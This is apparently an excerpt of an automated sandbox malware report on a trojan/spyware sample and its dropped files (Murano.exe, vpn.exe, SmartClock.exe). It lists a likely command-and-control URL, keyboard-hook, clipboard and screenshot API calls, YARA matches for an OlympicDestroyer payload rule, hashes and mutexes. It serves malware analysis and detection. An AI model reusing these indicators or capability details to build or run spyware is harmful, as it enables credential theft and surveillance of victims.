              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383529704.0000000004207000.00000004.00000001.sdmpString found in binary or memory: http://mardeq01.top/index.php
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377165659.0000000005CD9000.00000004.00000001.sdmp, Murano.exe, 0000000D.00000000.381399655.0000000000409000.00000002.00020000.sdmp, Murano.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://www.avast.com0
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://www.avast.com0/
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377605522.0000000005CD2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: Notti.eps.18.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: https://www.globalsign.com/repository/06
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Contains functionality to register a low level keyboard hookShow sources
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_004082E1 SetWindowsHookExW 00000002,Function_000082B3,00000000,00000000
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_00409086 GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00414000 Sleep,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,GdiplusShutdown,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383438295.000000000416A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeProcess Stats: CPU usage > 98%
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F59AC0 NtdllDefWindowProc_W,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F59946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A09946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A09AC0 NtdllDefWindowProc_W,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059D9946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059D9AC0 NtdllDefWindowProc_W,
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0041609C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004A12A9
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004B94A5
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004176A8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004A79F2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004A0AA0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00409DF0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004A7E56
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0044D060
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0049E000
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0040E0E0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0048D0F0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004A80BB
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00407150
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00408160
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0046C110
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0043A1D0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004BC25E
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0044F230
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004BE2ED
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004072F0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004BC37E
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00460310
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004AE390
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_004AC3BD
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00423440
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0048F440
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0042B410
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00485410
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00446422
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0041D4D0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00406550
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0049C500
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00487520
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_0040737E
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_00406EFE
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_004079A2
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_004049A8
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_004158DD
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_00438A70
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0043C169
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0043D29D
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0043F3E9
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0043BC3E
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0043CD1D
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0043C6AD
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0043CF98
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F65B2D
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_004053A7
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_0040A800
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_0040B0C0
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_0040A140
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_0040E970
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00418250
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_0040E208
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_0040AA10
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00418A21
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00418AFB
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00409A90
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00409C50
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_0040BC20
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00416DCB
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00418D93
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00413764
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_004158DD
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_00438A70
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0043C169
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0043D29D
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0043F3E9
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0043BC3E
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0043CD1D
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0043C6AD
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0043CF98
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A15B2D
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_004158DD
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_00438A70
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0043C169
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0043D29D
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0043F3E9
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0043BC3E
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0043CD1D
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0043C6AD
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0043CF98
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059E5B2D
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe 826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Murano.exe 826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\New Feature\4.exe 02F5996141F5FE2B189D8E2B1556EAB985E55E91D9F476DABC691F7C693B2400
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe 1A584D3F6C556EF5B10AEE7D057ADAB2EFFE774D1E85B19FF108899BC84371F3
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: String function: 004033FF appears 45 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: String function: 00401120 appears 130 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: String function: 00421500 appears 65 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: String function: 00421E40 appears 112 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: String function: 00405BC0 appears 100 times
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: String function: 004062CF appears 58 times
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: String function: 059DA650 appears 33 times
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: String function: 0040A400 appears 66 times
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: String function: 05A0A650 appears 33 times
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: String function: 0040F159 appears 36 times
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: String function: 0040A400 appears 33 times
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: String function: 03F5A650 appears 33 times
              Source: vpn.exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.395017335.0000000008770000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.395017335.0000000008770000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.384789346.0000000006210000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamechartv.dll.muij% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.394558547.0000000008680000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.384521726.00000000060A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383911985.0000000005D10000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: 4.exe.13.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: SmartClock.exe.16.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@41/35@5/3
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00408E03 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_004024FB CoCreateInstance,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_004017BA FindResourceW,LoadResource,LockResource,SizeofResource,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile created: C:\Users\user\AppData\Roaming\SatirJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_01
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeMutant created: \Sessions\1\BaseNamedObjects\{48D87B02-03F7-4188-8BE8-7733FF2CBCA6}
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:852:120:WilError_01
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile created: C:\Users\user\AppData\Local\Temp\tZVdZWixJump to behavior
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
